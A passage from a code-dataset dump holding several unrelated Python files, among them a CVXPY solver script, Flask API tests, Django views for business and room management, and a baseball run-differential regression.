os.makedirs('cvx-solutions')\n if not os.path.isdir('cvx-solutions/logs'):\n os.makedirs('cvx-solutions/logs')\n save_file = os.path.join(\n 'cvx-solutions',\n '{}-dual-alpha{}-eps{}-{}.npz'.format(test_file[:-4], alpha, eps, split))\n log_file = os.path.join(\n 'cvx-solutions/logs',\n '{}-dual-alpha{}-eps{}-{}.log'.format(test_file[:-4], alpha, eps, split))\n print = setup_logger(log_file)\n\n syn_data = sio.loadmat(test_file)\n A = syn_data['A'].astype(np.float32)\n m, n = A.shape\n\n X = syn_data[split + '_x'].astype(np.float32).T # (m, #samples)\n Z = syn_data[split + '_z'].astype(np.float32).T # (n, #samples)\n E = syn_data[split + '_e'].astype(np.float32).T # (m, #samples)\n n_samples = X.shape[1]\n\n Z_var = cp.Variable((n,batch_size))\n E_var = cp.Variable((m,batch_size))\n X_param = cp.Parameter((m,batch_size))\n objective = cp.Minimize(augmented_objective_fn(Z_var, E_var, alpha, eps))\n constraints = [cp.matmul(A, Z_var) + E_var == X_param]\n problem = cp.Problem(objective, constraints)\n\n Z_sol = np.zeros(Z.shape, dtype=np.float32)\n E_sol = np.zeros(E.shape, dtype=np.float32)\n L_sol = np.zeros((m, E.shape[1]), dtype=np.float32)\n\n for i in range(n_samples // batch_size):\n\n X_param.value = X[:, i*batch_size:(i+1)*batch_size]\n out = problem.solve()\n print('[{:2d}/{:2d}]\\t{}'.format(i+1, n_samples//batch_size, out))\n Z_sol[:, i*batch_size:(i+1)*batch_size] = Z_var.value\n E_sol[:, i*batch_size:(i+1)*batch_size] = E_var.value\n L_sol[:, i*batch_size:(i+1)*batch_size] = constraints[0].dual_value\n\n np.savez(save_file, Z=Z_sol, E=E_sol, L=L_sol)\n print('Solutions saved to file {}'.format(save_file))\n\n","sub_path":"compute_cvx_solutions_dual.py","file_name":"compute_cvx_solutions_dual.py","file_ext":"py","file_size_in_byte":3677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"399060709","text":"# -*- coding: UTF-8 -*-\nimport sys, os\nimport subprocess, hashlib\nfrom datetime import datetime, timedelta\nimport smtplib, zlib\nimport logging.config, logging, logging.handlers\nimport YhLog\ntry:\n import json\nexcept:\n import simplejson as json\n \nlogger = logging.getLogger(__name__)\n\n\n'''\n return comp from unicode string\n'''\ndef compress(str_unicode=''):\n str_utf8 = str_unicode\n if(type(str_unicode) is unicode):\n str_utf8 = str_unicode.encode('utf-8', 'ignore')\n return zlib.compress(str_utf8)\n\n'''\n return unicode string from comp\n'''\ndef decompress(str_comp=''):\n str_utf8 = str_comp\n if(type(str_comp) is unicode):\n str_utf8 = str_comp.encode('utf-8', 'ignore')\n return unicode(zlib.decompress(str_utf8), 'utf-8', 'ignore')\n\ndef test():\n logger.setLevel(logging.DEBUG)\n a = {'name':u'测试', 'val':u'返回值','error':'0'}\n str_a = json.dumps(a)\n logger.warn(str_a)\n comp_a = compress(str_a)\n decomp_a = decompress(comp_a)\n b = json.loads(decomp_a)\n logger.warn(str(b))\n\nif __name__=='__main__':\n test()\n ","sub_path":"YhCompress.py","file_name":"YhCompress.py","file_ext":"py","file_size_in_byte":1090,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"522454709","text":"db.create_all()\nDocument.insert_documents()\nFormField.insert_fields()\nTextLineSource.load_sources()\n\n# Add 'Other' to forms table\nform = Form(form_name='Other')\ndb.session.add(form)\n\nfilename = 'ML15009A030'\nDocument.load_pdf(filename)\ndoc = Document.query.filter_by(filename=filename).first()\npage_number = 1\npage = Page.query.filter(Page.doc_id == doc.id).filter(Page.page_number == page_number).first()\nform = Form.query.filter_by(form_name='Form 366').first()\n\n# update page form\npage.page_form = form\n\n# get form fields and text line\ntop_form_field = FormField.query.filter_by(name='Top Form 366').first()\nbottom_form_field = FormField.query.filter_by(name='Bottom Form 366').first()\ntop_textline = TextLine.query.filter_by(text='NRC FORM 366 \\n(01-2014) \\n').first()\n\n# add tag for field: Top Form 366\ntagged_text = TaggedText(textline=top_textline, field=top_form_field)\ndb.session.add(tagged_text)\n\n# add missing tag\nmissing_field = MissingField(missing_page=page, field=bottom_form_field)\ndb.session.add(missing_field)\n\ndb.session.commit()\n","sub_path":"add_initial_data.py","file_name":"add_initial_data.py","file_ext":"py","file_size_in_byte":1051,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"16327000","text":"# Testing video capture with opencv2.\r\n\r\n\r\nimport cv2\r\n\r\ncap = cv2.VideoCapture(0)\r\n\r\nwhile True :\r\n ret,frame = cap.read()\r\n grayframe = cv2.cvtColor(frame,cv2.COLOR_BGR2GRAY)\r\n \r\n # Show this image\r\n cv2.imshow('fig',frame)\r\n if cv2.waitKey(1) & 0xFF==ord('q'):\r\n break\r\n \r\ncap.release()\r\ncv2.destroyAllWindows()","sub_path":"prework/opencv/useCamera.py","file_name":"useCamera.py","file_ext":"py","file_size_in_byte":342,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"552236759","text":"from htetl.extract.phones import extract_phone\nimport os\nimport pandas as pd\nfrom pandas.util.testing import assert_frame_equal\n\ndef test_extract_phones():\n df = pd.DataFrame(\n [\n (1, \"blah blah 123-456-7890\"),\n (2, \"No phone number here!\"),\n (3, \"000-000-0000 and another one twothree4-ONE45-zeRO5fIve5\")\n ],\n columns=[\"id\", \"content\"]\n )\n expected = pd.DataFrame(\n [\n (1, \"123-456-7890\"),\n (3, \"000-000-0000\"),\n (3, \"234-145-0555\"),\n ],\n columns=[\"pageid\", \"phone\"]\n )\n phone_df = extract_phone(df)\n assert_frame_equal(phone_df,expected)\n #assert all(phone_df == expected)\n\ndef test_no_numbers():\n df = pd.DataFrame(\n [\n (1, \"blah blah 123-456-789\"),\n (2, \"No phone number here!\"),\n (3, \"000-000dashs0000\")\n ],\n columns=[\"id\", \"content\"]\n )\n\n phone_df = extract_phone(df)\n assert phone_df.empty\n","sub_path":"tests/extract/test_phones.py","file_name":"test_phones.py","file_ext":"py","file_size_in_byte":993,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"520288004","text":"# APITESTS.PY\n\n\"\"\"Basic functionality testing for provided API endpoints.\"\"\"\n\nimport config\nimport os\nimport json\nimport unittest\nimport api\n\nfrom flask import Flask\n\ntry:\n from flask_testing import TestCase\nexcept ImportError as e:\n print(\"PLEASE RUN 'pip install Flask-Testing'.\")\n\n\nclass TestCharactersEndpoint(TestCase):\n def create_app(self):\n # Note: Since we do not pull the cache into our test,\n # all cache calls done by our app will return None, so\n # our app always loads from disk for the purpose of testing.\n # This is intended, as cache functionality should be tested\n # separately (as it is). Ditto for other endpoint tests.\n return api.create_app()\n\n def test_all_data(self):\n # Ensure the correct keys are returned.\n all_route = os.path.join(config.CHARACTERS_DIR, config.ALL_DATA)\n response = self.client.get(all_route)\n with open(config.HP_CHARACTERS_FILE_PATH) as f:\n actual = json.load(f)\n self.assertEqual(response.json, [entity['_id'] for entity in actual])\n\n def test_valid_request(self):\n valid_id = '5a0fa4daae5bc100213c232e'\n expected = {\"_id\":\"5a0fa4daae5bc100213c232e\",\"name\":\"Hannah Abbott\",\n \"role\":\"student\",\"house\":\"Hufflepuff\",\n \"school\":\"Hogwarts School of Witchcraft and Wizardry\",\n \"__v\":0,\"ministryOfMagic\":False,\"orderOfThePhoenix\":False,\n \"dumbledoresArmy\":True,\"deathEater\":False,\n \"bloodStatus\":\"half-blood\",\"species\":\"human\"}\n\n valid_route = os.path.join(config.CHARACTERS_DIR, valid_id)\n response = self.client.get(valid_route)\n \n self.assertEqual(response.json, expected)\n\n def test_invalid_request(self):\n invalid_id = 'invalid'\n expected = {'error': f'404 Not Found: Invalid character id: {invalid_id}.'}\n\n invalid_route = os.path.join(config.CHARACTERS_DIR, invalid_id)\n response = self.client.get(invalid_route)\n\n self.assertEqual(response.json, expected)\n\n\nclass TestSpellsEndpoint(TestCase):\n def create_app(self):\n return api.create_app()\n\n def test_all_data(self):\n # Ensure the correct keys are returned.\n all_route = os.path.join(config.SPELLS_DIR, config.ALL_DATA)\n response = self.client.get(all_route)\n with open(config.HP_SPELLS_FILE_PATH) as f:\n actual = json.load(f)\n self.assertEqual(response.json, [entity['_id'] for entity in actual])\n\n def test_valid_request(self):\n valid_id = '5b74ebd5fb6fc0739646754c'\n expected = {\"_id\":\"5b74ebd5fb6fc0739646754c\",\"spell\":\"Aberto\",\n \"type\":\"Charm\",\"effect\":\"opens objects\"}\n\n valid_route = os.path.join(config.SPELLS_DIR, valid_id)\n response = self.client.get(valid_route)\n\n self.assertEqual(response.json, expected)\n \n def test_invalid_request(self):\n invalid_id = 'invalid'\n expected = {'error': f'404 Not Found: Invalid spell id: {invalid_id}.'}\n\n invalid_route = os.path.join(config.SPELLS_DIR, invalid_id)\n response = self.client.get(invalid_route)\n\n self.assertEqual(response.json, expected)\n \n\nclass TestHousesEndpoint(TestCase):\n def create_app(self):\n return api.create_app()\n\n def test_all_data(self):\n # Ensure the correct keys are returned.\n all_route = os.path.join(config.HOUSES_DIR, config.ALL_DATA)\n response = self.client.get(all_route)\n with open(config.HP_HOUSES_FILE_PATH) as f:\n actual = json.load(f)\n self.assertEqual(response.json, [entity['_id'] for entity in actual])\n\n def test_valid_request(self):\n valid_id = '5a05dc58d45bd0a11bd5e070'\n expected = {\"_id\":\"5a05dc58d45bd0a11bd5e070\",\"name\":\"Hufflepuff\",\n \"mascot\":\"badger\",\"headOfHouse\":\"Pomona Sprout\",\n \"houseGhost\":\"The Fat Friar\",\"founder\":\"Helga Hufflepuff\",\n \"__v\":0,\"school\":\"Hogwarts School of Witchcraft and Wizardry\",\n \"members\":[\"5a0fa11a4d153d00212c47cc\",\"5a0fa360ae5bc100213c232c\",\n \"5a0fa365ae5bc100213c232d\",\"5a0fa4daae5bc100213c232e\",\"5a0fa842ae5bc100213c2339\",\n \"5a0fa86dae5bc100213c233a\",\"5a1096253dc2080021cd875f\",\"5a1098bd3dc2080021cd876d\",\n \"5a109c993dc2080021cd8783\",\"5a1223720f5ae10021650d6f\",\"5a1223ed0f5ae10021650d70\",\n \"5a122f3d0f5ae10021650d8d\",\"5a1232b10f5ae10021650d95\",\"5a12333f0f5ae10021650d96\",\n \"5a1234500f5ae10021650d99\",\"5a1235790f5ae10021650d9d\",\"5a123cb40f5ae10021650dbc\"],\n \"values\":[\"hard work\",\"patience\",\"justice\",\"loyalty\"],\"colors\":[\"yellow\",\"black\"]}\n\n valid_route = os.path.join(config.HOUSES_DIR, valid_id)\n response = self.client.get(valid_route)\n\n self.assertEqual(response.json, expected)\n \n def test_invalid_request(self):\n invalid_id = 'invalid'\n expected = {'error': f'404 Not Found: Invalid house id: {invalid_id}.'}\n\n invalid_route = os.path.join(config.HOUSES_DIR, invalid_id)\n response = self.client.get(invalid_route)\n\n self.assertEqual(response.json, expected)\n \n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"backend/apitests.py","file_name":"apitests.py","file_ext":"py","file_size_in_byte":5314,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"246452250","text":"import argparse\nimport os\nimport time\n\nimport numpy as np\nfrom pycompss.api.api import barrier\n\nfrom dislib.classification import RandomForestClassifier\nfrom dislib.data import (load_libsvm_file, load_libsvm_files, load_txt_file,\n load_txt_files)\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--libsvm\", help=\"read files in libsvm format\",\n action=\"store_true\")\n parser.add_argument(\"-dt\", \"--detailed_times\",\n help=\"get detailed execution times (read and fit)\",\n action=\"store_true\")\n parser.add_argument(\"-e\", \"--estimators\", metavar=\"N_ESTIMATORS\",\n type=int, help=\"default is 10\", default=10)\n parser.add_argument(\"-p\", \"--part_size\", metavar=\"PART_SIZE\", type=int,\n help=\"size of the partitions in which to divide the \"\n \"input dataset (default is 100)\", default=100)\n parser.add_argument(\"-md\", \"--max_depth\", metavar=\"MAX_DEPTH\",\n type=int, help=\"default is np.inf\", required=False)\n parser.add_argument(\"-dd\", \"--dist_depth\", metavar=\"DIST_DEPTH\", type=int,\n help=\"default is auto\", required=False)\n parser.add_argument(\"-f\", \"--features\", metavar=\"N_FEATURES\", type=int,\n default=None, required=True)\n parser.add_argument(\"--dense\", help=\"use dense data structures\",\n action=\"store_true\")\n parser.add_argument(\"-t\", \"--test-file\", metavar=\"TEST_FILE_PATH\",\n help=\"test CSV file path\", type=str, required=False)\n parser.add_argument(\"train_data\",\n help=\"File or directory containing files \"\n \"(if a directory is provided PART_SIZE is \"\n \"ignored)\", type=str)\n args = parser.parse_args()\n\n train_data = args.train_data\n\n s_time = time.time()\n read_time = 0\n\n sparse = not args.dense\n\n if os.path.isdir(train_data):\n if args.libsvm:\n data = load_libsvm_files(train_data, args.features,\n store_sparse=sparse)\n else:\n data = load_txt_files(train_data, args.features, label_col=\"last\")\n else:\n if args.libsvm:\n data = load_libsvm_file(train_data, subset_size=args.part_size,\n n_features=args.features,\n store_sparse=sparse)\n else:\n data = load_txt_file(train_data, subset_size=args.part_size,\n n_features=args.features, label_col=\"last\")\n\n if args.detailed_times:\n barrier()\n read_time = time.time() - s_time\n s_time = time.time()\n\n if args.dist_depth:\n dist_depth = args.dist_depth\n else:\n dist_depth = \"auto\"\n\n if args.max_depth:\n max_depth = args.max_depth\n else:\n max_depth = np.inf\n\n forest = RandomForestClassifier(n_estimators=args.estimators,\n max_depth=max_depth,\n distr_depth=dist_depth)\n forest.fit(data)\n\n barrier()\n fit_time = time.time() - s_time\n\n out = [forest.n_estimators, forest.distr_depth, forest.max_depth,\n read_time, fit_time]\n\n if args.test_file:\n if args.libsvm:\n test_data = load_libsvm_file(args.test_file,\n n_features=args.features,\n subset_size=args.part_size,\n store_sparse=sparse)\n else:\n test_data = load_txt_file(args.test_file,\n n_features=args.features,\n subset_size=args.part_size,\n label_col=\"last\")\n\n out.append(forest.score(test_data))\n\n print(out)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"examples/rf-driver.py","file_name":"rf-driver.py","file_ext":"py","file_size_in_byte":4022,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"66745662","text":"from django.shortcuts import get_object_or_404, render\nfrom businesses.models import Business, Goal, Worker, Resource, Finance, Location, Material,Room\nfrom django.shortcuts import render_to_response, HttpResponse\nfrom django.template.context import RequestContext\nfrom chartit import DataPool, Chart\nfrom django.http import HttpResponseRedirect\nfrom django.core.urlresolvers import reverse\n\n\nfrom models import Goal_score, Finance_score\n\n\ndef goal_chart_view(request, business_id, goal_id):\n goal_data = \\\n DataPool(\n series=\n [{'options': {\n 'source': Goal_score.objects.filter(goal_name_id=goal_id)},\n 'terms': [\n 'school_year',\n 'goal',\n 'score']}\n ])\n\n\n cht = Chart(\n datasource=goal_data,\n series_options=\n [{'options': {\n 'type': 'line',\n 'stacking': False},\n 'terms': {\n 'school_year': [\n 'goal',\n 'score']\n }}],\n chart_options=\n {'title': {\n 'text': 'Data of ' + Goal.objects.get(pk=goal_id).goal_name },\n 'xAxis': {\n 'title': {\n 'text': 'school_year'}}})\n\n business = get_object_or_404(Business, pk=business_id)\n\n context = {'business': business,\n 'datachart': cht}\n\n return render(request, 'businesses/chart.html', context)\n\n\ndef finance_chart_view(request, business_id,finance_id):\n ds = DataPool(\n series=\n [{'options': {\n 'source': Finance_score.objects.filter(finance_name_id=finance_id)},\n 'terms': [\n 'year',\n 'goal',\n 'price']}\n ])\n\n\n cht = Chart(\n datasource=ds,\n series_options=\n [{'options': {\n 'type': 'column',\n 'stacking': True,\n 'stack': 0},\n 'terms': {\n 'year': [\n 'goal',\n {'price': {\n 'stack': 1}},]\n }}],\n chart_options=\n {'title': {\n 'text': 'Data of ' + Finance.objects.get(pk=finance_id).name },\n 'xAxis': {\n 'title': {\n 'text': 'year'}}})\n\n business = get_object_or_404(Business, pk=business_id)\n\n context = {'business': business,\n 'datachart': cht}\n\n return render(request, 'businesses/chart1.html', context)\n\n\n\ndef room(request, business_id, location_id):\n business = get_object_or_404(Business, pk=business_id)\n location = get_object_or_404(Location, pk=location_id)\n context = {'business': business,\n 'location': location}\n return render(request, 'businesses/room.html', context)\n\n\ndef reservation(request, business_id, location_id, room_id):\n room = Room.objects.get(pk=room_id)\n\n if room.reservation == 'Available':\n room.reservation = 'Occupied'\n room.save()\n\n return HttpResponseRedirect(reverse('businesses:room', args=(business_id,location_id,)))\n\n\ndef room_return(request, business_id, location_id, room_id):\n room = Room.objects.get(pk=room_id)\n\n if room.reservation == 'Occupied':\n room.reservation = 'Available'\n room.save()\n\n return HttpResponseRedirect(reverse('businesses:room', args=(business_id,location_id,)))\n\ndef material_number(request, business_id,material_id):\n material = Material.objects.get(pk=material_id)\n\n if material.not_used_number > 0:\n material.not_used_number -= 1;\n material.used_number += 1;\n material.save()\n else:\n material.not_used_number = 0\n material.save()\n\n return HttpResponseRedirect(reverse('businesses:material', args=(business_id,)))\n\ndef material_return(request, business_id,material_id):\n material = Material.objects.get(pk=material_id)\n\n if material.used_number > 0:\n material.not_used_number += 1;\n material.used_number -= 1;\n material.save()\n else:\n material.used_number = 0\n material.save()\n\n return HttpResponseRedirect(reverse('businesses:material', args=(business_id,)))\n\n\n\ndef index(request):\n business_list = Business.objects.all()\n context = RequestContext(request, {'request': request, 'business_list': business_list})\n return render_to_response('businesses/index.html', context_instance=context)\n\ndef menu(request, business_id):\n business = get_object_or_404(Business, pk=business_id)\n return render(request, 'businesses/menu.html', {'business': business})\n\n\ndef goal(request, business_id):\n business = get_object_or_404(Business, pk=business_id)\n return render(request, 'businesses/goal_detail.html', {'business': business})\n\ndef worker(request, business_id):\n business = get_object_or_404(Business, pk=business_id)\n return render(request, 'businesses/worker_detail.html', {'business': business})\n\ndef finance(request, business_id):\n business = get_object_or_404(Business, pk=business_id)\n return render(request, 'businesses/finance_detail.html', {'business': business})\n\ndef resource(request, business_id):\n business = get_object_or_404(Business, pk=business_id)\n return render(request, 'businesses/resource_detail.html', {'business': business})\n\ndef location(request, business_id):\n business = get_object_or_404(Business, pk=business_id)\n return render(request, 'businesses/location_detail.html', {'business': business})\n\ndef material(request, business_id):\n business = get_object_or_404(Business, pk=business_id)\n return render(request, 'businesses/material_detail.html', {'business': business})\n\n\n\n\n","sub_path":"Final_Project/thirdauth/businesses/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5702,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"288632343","text":"# Import libraries\nimport pandas as pd\nimport numpy as np\nfrom sklearn import linear_model\nfrom scipy import stats\nimport matplotlib.pyplot as plt\n\n#datasets: http://www.retrosheet.org/gamelogs/index.html\n#labels for the data set: http://www.retrosheet.org/gamelogs/glfields.txt\n'''\nField(s) Meaning\n 1 Date in the form \"yyyymmdd\"\n 2 Number of game:\n \"0\" -- a single game\n \"1\" -- the first game of a double (or triple) header\n including seperate admission doubleheaders\n \"2\" -- the second game of a double (or triple) header\n including seperate admission doubleheaders\n \"3\" -- the third game of a triple-header\n \"A\" -- the first game of a double-header involving 3 teams\n \"B\" -- the second game of a double-header involving 3 teams\n 3 Day of week (\"Sun\",\"Mon\",\"Tue\",\"Wed\",\"Thu\",\"Fri\",\"Sat\")\n 4-5 Visiting team and league\n 6 Visiting team game number\n For this and the home team game number, ties are counted as\n games and suspended games are counted from the starting\n rather than the ending date.\n 7-8 Home team and league\n 9 Home team game number\n10-11 Visiting and home team score (unquoted)\n 12 Length of game in outs (unquoted). A full 9-inning game would\n have a 54 in this field. If the home team won without batting\n in the bottom of the ninth, this field would contain a 51.\n 13 Day/night indicator (\"D\" or \"N\")\n 14 Completion information. If the game was completed at a\n later date (either due to a suspension or an upheld protest)\n this field will include:\n \"yyyymmdd,park,vs,hs,len\" Where\n yyyymmdd -- the date the game was completed\n park -- the park ID where the game was completed\n vs -- the visitor score at the time of interruption\n hs -- the home score at the time of interruption\n len -- the length of the game in outs at time of interruption\n All the rest of the information in the record refers to the\n entire game.\n 15 Forfeit information:\n \"V\" -- the game was forfeited to the visiting team\n \"H\" -- the game was forfeited to the home team\n \"T\" -- the game was ruled a no-decision\n 16 Protest information:\n \"P\" -- the game was protested by an unidentified team\n \"V\" -- a disallowed protest was made by the visiting team\n \"H\" -- a disallowed protest was made by the home team\n \"X\" -- an upheld protest was made by the visiting team\n \"Y\" -- an upheld protest was made by the home team\n Note: two of these last four codes can appear in the field\n (if both teams protested the game).\n 17 Park ID\n 18 Attendance (unquoted)\n 19 Time of game in minutes (unquoted)\n20-21 Visiting and home line scores. For example:\n \"010000(10)0x\"\n Would indicate a game where the home team scored a run in\n the second inning, ten in the seventh and didn't bat in the\n bottom of the ninth.\n22-38 Visiting team offensive statistics (unquoted) (in order):\n at-bats\n hits\n doubles\n triples\n homeruns\n RBI\n sacrifice hits. This may include sacrifice flies for years\n prior to 1954 when sacrifice flies were allowed.\n sacrifice flies (since 1954)\n hit-by-pitch\n walks\n intentional walks\n strikeouts\n stolen bases\n caught stealing\n grounded into double plays\n awarded first on catcher's interference\n left on base\n39-43 Visiting team pitching statistics (unquoted)(in order):\n pitchers used ( 1 means it was a complete game )\n individual earned runs\n team earned runs\n wild pitches\n balks\n44-49 Visiting team defensive statistics (unquoted) (in order):\n putouts. Note: prior to 1931, this may not equal 3 times\n the number of innings pitched. Prior to that, no\n putout was awarded when a runner was declared out for\n being hit by a batted ball.\n assists\n errors\n passed balls\n double plays\n triple plays\n50-66 Home team offensive statistics\n67-71 Home team pitching statistics\n72-77 Home team defensive statistics\n78-79 Home plate umpire ID and name\n80-81 1B umpire ID and name\n82-83 2B umpire ID and name\n84-85 3B umpire ID and name\n86-87 LF umpire ID and name\n88-89 RF umpire ID and name\n If any umpire positions were not filled for a particular game\n the fields will be \"\",\"(none)\".\n90-91 Visiting team manager ID and name\n92-93 Home team manager ID and name\n94-95 Winning pitcher ID and name\n96-97 Losing pitcher ID and name\n98-99 Saving pitcher ID and name--\"\",\"(none)\" if none awarded\n100-101 Game Winning RBI batter ID and name--\"\",\"(none)\" if none\n awarded\n102-103 Visiting starting pitcher ID and name\n104-105 Home starting pitcher ID and name\n106-132 Visiting starting players ID, name and defensive position,\n listed in the order (1-9) they appeared in the batting order.\n133-159 Home starting players ID, name and defensive position\n listed in the order (1-9) they appeared in the batting order.\n 160 Additional information. This is a grab-bag of informational\n items that might not warrant a field on their own. The field \n is alpha-numeric. Some items are represented by tokens such as:\n \"HTBF\" -- home team batted first.\n Note: if \"HTBF\" is specified it would be possible to see\n something like \"01002000x\" in the visitor's line score.\n Changes in umpire positions during a game will also appear in \n this field. These will be in the form:\n umpchange,inning,umpPosition,umpid with the latter three\n repeated for each umpire.\n These changes occur with umpire injuries, late arrival of \n umpires or changes from completion of suspended games. Details\n of suspended games are in field 14.\n 161 Acquisition information:\n \"Y\" -- we have the complete game\n \"N\" -- we don't have any portion of the game\n \"D\" -- the game was derived from box score and game story\n \"P\" -- we have some portion of the game. We may be missing\n innings at the beginning, middle and end of the game.\n \nMissing fields will be NULL.\n'''\n\ninput_df = pd.read_table(\"GL2015.TXT\", sep=\",\", header=None)\n\n# Method to rename columns of an input dataframe (for readability)\n# Input type: dataframe\n# Output type: dataframe\ndef rename_cols(input_df):\n input_df.rename(columns = {3: 'Visiting Team', 6: 'Home Team', 9: 'Runs Visitor', 10: 'Runs Home'}, inplace=True)\n return input_df\n\n# Invoke function to rename columns\ninput_df = rename_cols(input_df)\n\n# Method to add new columns to indicate whether home team or visiting team won the game\n# Input type: dataframe\n# Output type: dataframe\ndef add_new_cols(input_df):\n input_df['Home Win'] = (input_df['Runs Home'] > input_df['Runs Visitor'])\n input_df['Visitor Win'] = (input_df['Runs Visitor'] > input_df['Runs Home'])\n return input_df\n\n# Method to group data by home team and compute relevant statistics\n# Input type: dataframe\n# Output type: dataframe (with stats grouped by home team)\ndef proc_home_team_data(input_df):\n\n # Group by home team\n home_group = input_df.groupby(input_df['Home Team'])\n\n # Compute stats: Number of games, runs scored, runs conceded, wins, run differential\n home_df = home_group[['Runs Visitor', 'Runs Home', 'Home Win']].apply(sum)\n home_df['Home Games'] = home_group['Home Win'].count()\n home_df.rename(columns = {'Runs Visitor': 'Runs by Visitor', 'Runs Home': 'Runs at Home', 'Home Win': 'Wins at Home'}, inplace=True)\n home_df['RD at Home'] = home_df['Runs at Home'] - home_df['Runs by Visitor']\n home_df.index.rename('Team', inplace=True)\n home_df.reset_index(inplace=True)\n\n return home_df\n\n# Method to group data by visiting team and compute relevant statistics\n# Input type: dataframe\n# Output type: dataframe (with stats grouped by visiting team)\ndef proc_visiting_team_data(input_df):\n\n # Group by visiting team\n visit_group = input_df.groupby(input_df['Visiting Team'])\n\n # Compute stats: Number of games, runs scored, runs conceded, wins, run differential\n visit_df = visit_group[['Runs Visitor', 'Runs Home', 'Visitor Win']].apply(sum)\n visit_df['Road Games'] = visit_group['Visitor Win'].count()\n visit_df.rename(columns = {'Runs Visitor': 'Runs as Visitor', 'Runs Home': 'Runs by Home', \n 'Visitor Win': 'Wins as Visitor'}, inplace=True)\n visit_df['RD as Visitor'] = visit_df['Runs as Visitor'] - visit_df['Runs by Home']\n visit_df.index.rename('Team', inplace=True)\n visit_df.reset_index(inplace=True)\n\n return visit_df\n\n# Method to merge dataframes with statistics grouped by home and visiting teams\n# and to explicitly compute explanatory and response variables\n# Input type: dataframe, dataframe\n# Output type: dataframe\ndef merge_data_frames(home_df, visit_df):\n # Compute explanatory and response variables\n overall_df = home_df.merge(visit_df, how='outer', left_on='Team', right_on='Team')\n overall_df['RD'] = overall_df['RD at Home'] + overall_df['RD as Visitor']\n overall_df['Win Pct'] = (overall_df['Wins at Home'] + overall_df['Wins as Visitor']) / (overall_df['Home Games'] + overall_df['Road Games'])\n overall_df['Pythagorean expectation'] = 162 * (1 / (1 + np.power(\n (overall_df['Runs by Visitor'] + overall_df['Runs by Home'])/\n (overall_df['Runs as Visitor'] + overall_df['Runs at Home']), 1.83)))\n\n # Return dataframe with explanatory and response variables\n return overall_df\n\n# Method to collate all data preprocessing steps\n# Input type: dataframe\n# Output type: dataframe\ndef extract_linear_reg_inputs(input_df):\n # Rename columns\n input_df = rename_cols(input_df)\n\n # Add new columns\n input_df = add_new_cols(input_df)\n\n # Group and process data by home team\n home_df = proc_home_team_data(input_df)\n\n # Group and process data by visiting team\n visit_df = proc_visiting_team_data(input_df)\n\n # Merge home and visitor dataframes\n overall_df = merge_data_frames(home_df, visit_df)\n\n return overall_df\n\n# Get training data from 2011-2015 to train the linear regression model\n\n# Initialize arrays to hold training data\ntrain_run_diff = np.empty([0, 1])\ntrain_win_pct = np.empty([0, 1])\n\n# Loop\nfor year in range(2011, 2016):\n # Construct log file name\n log_file = \"GL\" + str(year) + \".TXT\"\n\n # Read log into a dataframe\n df = pd.read_table(log_file, sep=\",\", header=None)\n\n # Extract relevant stats into another dataframe\n df_proc = extract_linear_reg_inputs(df)\n\n # Add to training set\n train_run_diff = np.vstack([train_run_diff, df_proc['RD'].values.reshape([-1, 1])])\n train_win_pct = np.vstack([train_win_pct, df_proc['Win Pct'].values.reshape([-1, 1])]) \n\n # Instantiate an object\nlin_regr = linear_model.LinearRegression(fit_intercept=True)\n\n# Compute model parameters with training data\nlin_regr.fit(train_run_diff, train_win_pct)\n\n# Access and display model parameters\nprint(\"Slope (a) = \", float(lin_regr.coef_), \" Intercept (b) = \", float(lin_regr.intercept_))\n\n# Get regression score (R-squared)\nr_squared = lin_regr.score(train_run_diff, train_win_pct)\nprint(\"R-squared for linear fit = \", r_squared)\n\n# Visualize\nx_ax = np.array(range(int(np.min(train_run_diff)), int(np.max(train_run_diff)))).reshape(-1, 1)\ny_ax = lin_regr.coef_ * x_ax + lin_regr.intercept_\nplt.plot(train_run_diff, train_win_pct, 'bo', label=\"training_data\")\nplt.plot(x_ax, y_ax, 'r', label=\"model_fit\")\nplt.plot([-300, 300], [0.5, 0.5], \"k--\")\nplt.plot([0, 0], [0.30, 0.65], \"k--\")\nplt.ylim([0.30, 0.65])\nplt.xlabel(\"Run differential\")\nplt.ylabel(\"Win percentage\")\nplt.legend(loc=\"lower right\")\nplt.show()\n\n# Construct test dataset\nlog_file = \"GL2016.TXT\"\ndf = pd.read_table(log_file, sep=\",\", header=None)\ndf_proc = extract_linear_reg_inputs(df)\ntest_run_diff = df_proc['RD'].values.reshape([-1, 1])\ntest_win_pct = df_proc['Win Pct'].values.reshape([-1, 1])\n\n# Predict outcomes using regression model\npredict_win_pct = lin_regr.predict(test_run_diff)\n\n# Compute percentage error for linear regression model on test set\nmean_abs_error_test = np.mean(np.abs(predict_win_pct - test_win_pct))\nprint(\"Percentage error on test set = \", 100. * mean_abs_error_test, \"%\")\n\n# Compute percentage error for linear regression model on training set\nmodel_fit_train = lin_regr.predict(train_run_diff)\nmean_abs_error_training = np.mean(np.abs(model_fit_train - train_win_pct))\nprint(\"Percentage error on training set \", 100. * mean_abs_error_training, \"%\")\n\n# Visualize\nplt.plot(test_win_pct, predict_win_pct, 'bo')\nplt.plot([0.35, 0.7], [0.35, 0.7], 'r')\nplt.xlabel(\"Actual win percentage\")\nplt.ylabel(\"Predicted win percentage\")\nplt.title(\"MLB 2016 season\")\nplt.show()\n\n\n","sub_path":"baseballStats/baseballStats1.py","file_name":"baseballStats1.py","file_ext":"py","file_size_in_byte":13466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"64117131","text":"#encoding : utf-8\nimport os\nimport sys\nimport shutil\nfrom shutil import 